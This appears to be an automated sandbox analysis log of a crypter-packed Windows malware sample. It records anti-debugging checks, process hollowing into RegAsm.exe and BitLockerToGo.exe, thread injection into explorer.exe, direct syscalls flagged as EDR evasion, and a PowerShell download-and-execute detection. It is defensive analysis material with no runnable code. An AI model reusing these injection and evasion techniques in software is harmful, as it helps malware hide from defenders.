Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00553C90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_00553C90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00433130 mov eax, dword ptr fs:[00000030h]	2_2_00433130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00433130 mov eax, dword ptr fs:[00000030h]	2_2_00433130
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_0260092B mov eax, dword ptr fs:[00000030h]	12_2_0260092B
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_02600D90 mov eax, dword ptr fs:[00000030h]	12_2_02600D90
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Code function: 12_2_026CFDD7 push dword ptr fs:[00000030h]	12_2_026CFDD7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0050CCE0 lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,

2_2_0050CCE0

Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process token adjusted: Debug
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process token adjusted: Debug

Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe

Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0053FA25 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0053FA25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00553C90 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00553C90
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Code function: 15_2_00502F3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00502F3D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: ahcsduh.33.dr

Jump to dropped file

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe

Code function: 6_2_02D421A5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

6_2_02D421A5

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Thread created: C:\Windows\explorer.exe EIP: 8B519A8			Jump to behavior
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Thread created: unknown EIP: 70D9E4

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtUnmapViewOfSection: Direct from: 0x140F9991A
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x140FDE281
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtClose: Direct from: 0x140FB14BD
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x1418EC263
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x1412CA111
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x140FA149F
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x1412C887B
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtOpenFile: Direct from: 0x140FD7A67
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x1412CB049
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x141027997
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x140FE47B8
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Direct from: 0x1418ECF55
Source: C:\Users\user\Documents\iofolko5\u7IEXZpDnp1f9d_IZKWnjEtv.exe	NtProtectVirtualMemory: Indirect: 0x140F85475

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Memory written: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe	Memory written: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe base: 6F0000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56C000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58B000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 593000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D9000	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B3E008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D4B008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FF1008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 103F008	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 458000
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DFA008
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3200000
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 31BB008

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe "C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7888 -ip 7888
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7888 -s 876
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0053EE6E cpuid

2_2_0053EE6E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	2_2_005610C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_005612CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_00561373
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_005613BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_00561459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_005614E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	2_2_0055B578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoEx,FormatMessageA,	2_2_005406BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_00561737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00561860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_00561966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	2_2_0055BA47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00561A3C
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: GetLocaleInfoA,	8_2_0040520C
Source: C:\Users\user\Documents\iofolko5\kvOccCLzMNloI4W4GuGOaRuh.exe	Code function: GetLocaleInfoA,	8_2_00405258
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Code function: GetLocaleInfoW,	9_1_00434317

Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Queries volume information: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe	Queries volume information: C:\Users\user\Documents\iofolko5\JxvL46JFox50ORU3tEsaxZ2Y.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Queries volume information: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe	Queries volume information: C:\Users\user\Documents\iofolko5\LeVSNPB9FLpXmtLG7mcICpEf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe	Queries volume information: C:\Users\user\Documents\iofolko5\RK8ajtyf9pvKlaXEo3EjTbnu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe	Queries volume information: C:\Users\user\Documents\iofolko5\kCxbYlQ2A6NZXLbKZjtnUx3R.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Queries volume information: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Queries volume information: C:\Windows VolumeInformation
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Documents\iofolko5\jsh_U9TvBUPPM2QGPo3kny24.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
